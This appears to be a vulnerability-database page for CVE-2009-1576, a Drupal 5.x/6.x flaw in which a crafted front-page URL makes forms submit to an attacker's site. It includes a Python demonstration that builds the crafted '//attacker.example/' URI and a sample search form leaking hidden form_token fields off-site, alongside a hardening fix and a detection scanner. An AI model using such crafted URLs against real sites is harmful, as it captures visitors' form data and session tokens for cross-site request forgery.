CVE-2009-1576

Severity: Unknown
EPSS: 1.63%


CVE-2009-1576 is a vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11 (and in vbDrupal before 5.17.0) for which no severity score has been published. A victim who is tricked into opening the site's front page through a crafted URL is served forms, the search box among them, whose action points at an attacker-controlled site, so whatever the victim submits is sent to the attacker rather than to the site. NVD tentatively attributes the flaw to includes/bootstrap.inc not handling runs of / (slash) characters correctly, and notes that the captured form data can be used to mount cross-site request forgery (CSRF) attacks. EPSS estimates a 1.63% chance of exploitation in the next 30 days.

Description

Unspecified vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows user-assisted remote attackers to obtain sensitive information by tricking victims into visiting the front page of the site with a crafted URL and causing form data to be sent to an attacker-controlled site, possibly related to multiple / (slash) characters that are not properly handled by includes/bootstrap.inc, as demonstrated using the search box. NOTE: this vulnerability can be leveraged to conduct cross-site request forgery (CSRF) attacks.
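The mechanism the description points at is easiest to see with a worked example. A relative URL that begins with two slashes is scheme-relative: a browser reads `//attacker.example/` as a host name, not a path on the current site. If a site echoes the raw request URI into its form actions, then a link to `http://<site>//attacker.example/` produces forms that post to the attacker's host. The Python below is an added example, not Drupal's code: it contrasts the reflected action with one that collapses leading slashes to a single one, and includes a small scanner that reports forms posting off-site together with the hidden fields they would leak. The host names and the search-form HTML are constructed for the example; the assumption that the form action simply reflects the request URI is taken from the description, not verified against Drupal's source here.

```python
"""
Added example (not Drupal's code): why a request URI with doubled leading
slashes turns a self-posting form into a cross-site form post, and the
normalisation that closes the hole. Host names and HTML are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SITE = "http://drupal.example"          # constructed victim site
ATTACKER_HOST = "attacker.example"      # constructed attacker host


def vulnerable_form_action(request_uri: str) -> str:
    """Pre-fix pattern assumed here: the form posts back to the raw request URI."""
    return request_uri


def hardened_form_action(request_uri: str) -> str:
    """Collapse any run of leading slashes to exactly one.

    A relative reference starting with "//" is scheme-relative (RFC 3986 s4.2),
    so the browser reads "//attacker.example/" as a host, not a path. Forcing a
    single leading slash keeps the form action on the current host.
    """
    return "/" + request_uri.lstrip("/")


def resolve_action(page_url: str, action: str) -> str:
    """Where the browser will actually submit the form (RFC 3986 resolution)."""
    return urljoin(page_url, action)


def posts_off_site(page_url: str, action: str) -> bool:
    """True if the resolved action targets a host other than the page's own."""
    return urlsplit(resolve_action(page_url, action)).netloc != urlsplit(page_url).netloc


class _FormScanner(HTMLParser):
    """Collects (action, hidden input names) for each <form> in a page."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of (action, [hidden field names])
        self._hidden = None    # hidden-field list of the form being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._hidden = []
            self.forms.append((a.get("action", ""), self._hidden))
        elif tag == "input" and a.get("type") == "hidden" and self._hidden is not None:
            self._hidden.append(a.get("name", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._hidden = None


def find_leaking_forms(page_url: str, html: str) -> list[tuple[str, list[str]]]:
    """Return (resolved action, hidden field names) for forms that post off-site.

    Run it over the HTML returned for http://<site>//<anything>/ to check whether
    an installation reflects the doubled slash into its form actions.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    return [(resolve_action(page_url, action), hidden)
            for action, hidden in scanner.forms if posts_off_site(page_url, action)]


# Constructed front-page fragment shaped like a Drupal 6 search block: the
# action is whatever the request URI was, and the form carries the hidden
# form_build_id / form_token / form_id fields Drupal adds to its forms.
CRAFTED_URI = f"//{ATTACKER_HOST}/"
SAMPLE_PAGE = f"""
<form action="{vulnerable_form_action(CRAFTED_URI)}" method="post" id="search-block-form">
  <input type="text" name="search_block_form" size="15" />
  <input type="submit" value="Search" />
  <input type="hidden" name="form_build_id" value="form-0123456789abcdef" />
  <input type="hidden" name="form_token" value="fedcba9876543210" />
  <input type="hidden" name="form_id" value="search_block_form" />
</form>
"""

if __name__ == "__main__":
    page_url = SITE + CRAFTED_URI      # http://drupal.example//attacker.example/
    print("reflected action resolves to:",
          resolve_action(page_url, vulnerable_form_action(CRAFTED_URI)))
    print("hardened action resolves to:",
          resolve_action(page_url, hardened_form_action(CRAFTED_URI)))
    for action, hidden in find_leaking_forms(page_url, SAMPLE_PAGE):
        print(f"form posts off-site to {action}; hidden fields leaked: {hidden}")
```

Two practical notes. First, the check only means something against the live stack: `REQUEST_URI` is the raw request line, and whether a front proxy or the web server collapses `//` before the application sees it varies, so fetch `http://<site>//<anything>/` and inspect the served form actions rather than reasoning from configuration. Second, the CSRF angle in the NVD note follows from what leaks: Drupal's forms carry a hidden `form_token` bound to the visitor's session, and a token captured this way is what lets an attacker submit the corresponding form on the victim's behalf.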

Metrics

EPSS Probability: 1.63% (73.2nd percentile)

Probability of exploitation in the next 30 days.

Affected Software

Vendor   Product   Version      Update
Drupal   Drupal    5.0          Beta1
Drupal   Drupal    5.1
Drupal   Drupal    5.1_rev1.1
Drupal   Drupal    5.10
Drupal   Drupal    5.11
Drupal   Drupal    5.12
Drupal   Drupal    5.13
Drupal   Drupal    5.14
Drupal   Drupal    5.15
Drupal   Drupal    5.16
Drupal   Drupal    6.0          Beta1
Drupal   Drupal    6.1
Drupal   Drupal    6.2
Drupal   Drupal    6.3
Drupal   Drupal    6.4
Drupal   Drupal    6.5
Drupal   Drupal    6.6
Drupal   Drupal    6.7
Drupal   Drupal    6.8
Drupal   Drupal    6.9
Drupal   Drupal    6.10

References

Timeline

Published:
Last Modified:
Status: Modified

Frequently Asked Questions

What is CVE-2009-1576?
An information-disclosure flaw in Drupal 5.x before 5.17 and 6.x before 6.11 (and vbDrupal before 5.17.0). A crafted front-page URL, apparently one containing repeated / characters that includes/bootstrap.inc does not handle properly, makes the page's forms (the search box, for example) submit to an attacker-controlled site, and the captured form data can then be used for cross-site request forgery. NVD's full text is in the Description above.
How severe is CVE-2009-1576?
No CVSS score has been published for CVE-2009-1576, so its severity is listed as unknown pending analysis. The EPSS model estimates a 1.63% probability of exploitation in the next 30 days.
How do I fix CVE-2009-1576?
Upgrade to the fixed releases named in the description: Drupal 5.17 or later on the 5.x branch, Drupal 6.11 or later on the 6.x branch, and vbDrupal 5.17.0 or later. Check the vendor references and advisories for further mitigation guidance. You can also run a Strix scan to test whether your systems are affected.

Are you affected by CVE-2009-1576?

Run a free Strix scan to check your systems for this vulnerability.

Source: NVD / NIST